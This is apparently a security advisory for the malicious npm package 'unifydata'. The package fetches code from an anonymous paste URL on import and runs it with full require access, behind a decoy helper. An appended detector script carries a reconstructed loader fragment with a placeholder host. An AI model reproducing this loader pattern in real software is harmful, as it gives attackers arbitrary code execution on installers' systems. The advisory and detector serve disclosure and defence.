MAL-2026-6441
Malicious code in unifydata (npm)
Details
## Source: amazon-inspector (0c62d93328810f03f3aac73777f406eee1b3413e1c3320eb87f3445754dba9d3)

On require('unifydata'), index.js calls initPlugin() at module top level, performs an HTTPS GET to https://jsonkeeper.com/b/B40HL, JSON-parses the response, and executes the response's `cookie` field as JavaScript via `new Function.constructor('require', body.cookie)` — then immediately invokes the resulting function with the real `require`, granting it full Node module-loading capability. jsonkeeper.com is an anonymous, author-mutable JSON paste service; the bytes executed in any installer process are whatever the author has posted there at the time of import, with no pinning, hashing, or signature. The package presents itself with a header comment labeling it `normalize-plus (ES6 safe version)` and ships a benign-looking `normalizePath` helper as a decoy, while the published package name is `unifydata` — the mislabeled cover and unused utility code are consistent with a dropper masquerading as a routine helper. Any process that imports this package executes arbitrary attacker-controlled code with the privileges of that process.
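A static check for the loading pattern described above, written as an added example (it is not part of this advisory, the package, or any scanner's actual rule set). The rule names, verdict labels and both sample sources are constructed for illustration; the sample URL is a placeholder.

```javascript
// Heuristic: flag a source file that both fetches remote content and builds
// code at runtime, and escalate when `require` is handed to the built function.
// Rule ids and verdict labels are assumptions made for this example.
const RULES = [
  { id: 'remote-fetch', re: /\b(?:https?\.(?:get|request)|fetch|axios(?:\.\w+)?)\s*\(/ },
  { id: 'dynamic-code', re: /\bnew\s+Function\b|\bFunction\s*\.\s*constructor\b|\bFunction\s*\(|\beval\s*\(/ },
  { id: 'require-handoff', re: /Function(?:\s*\.\s*constructor)?\s*\(\s*['"`]require['"`]/ },
];

function scanSource(src) {
  const hits = [];
  src.split(/\r?\n/).forEach((line, i) => {
    for (const { id, re } of RULES) {
      if (re.test(line)) hits.push({ rule: id, line: i + 1 });
    }
  });
  const seen = new Set(hits.map((h) => h.rule));
  // A fetch or a dynamic evaluation alone is common in legitimate code;
  // the combination in one file is the behaviour the advisory describes.
  let verdict = 'not-flagged';
  if (seen.has('remote-fetch') && seen.has('dynamic-code')) {
    verdict = seen.has('require-handoff') ? 'remote-code-loader' : 'suspicious';
  }
  return { verdict, hits };
}

// Constructed fragment shaped like the advisory's description (never executed).
const SAMPLE_LOADER = [
  "const https = require('https');",
  "function initPlugin() {",
  "  https.get('https://paste.example.invalid/b/PLACEHOLDER', (res) => {",
  "    /* body collected and JSON-parsed here */",
  "    const fn = new Function.constructor('require', body.cookie);",
  "    fn(require);",
  "  });",
  "}",
  "initPlugin();",
].join('\n');

// Constructed benign module: makes a network call but never evaluates text as code.
const SAMPLE_BENIGN = [
  "const https = require('https');",
  "https.get('https://registry.example.invalid/status', (res) => res.resume());",
  "module.exports.normalizePath = (p) => p.trim();",
].join('\n');

console.log(scanSource(SAMPLE_LOADER).verdict, scanSource(SAMPLE_BENIGN).verdict);
```

Line-based regex matching misses obfuscated or split-across-lines variants, so a `not-flagged` result is not evidence that a package is safe.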
Affected packages
No fixed version published yet for unifydata (npm). Pin to a known-safe version or switch to an alternative.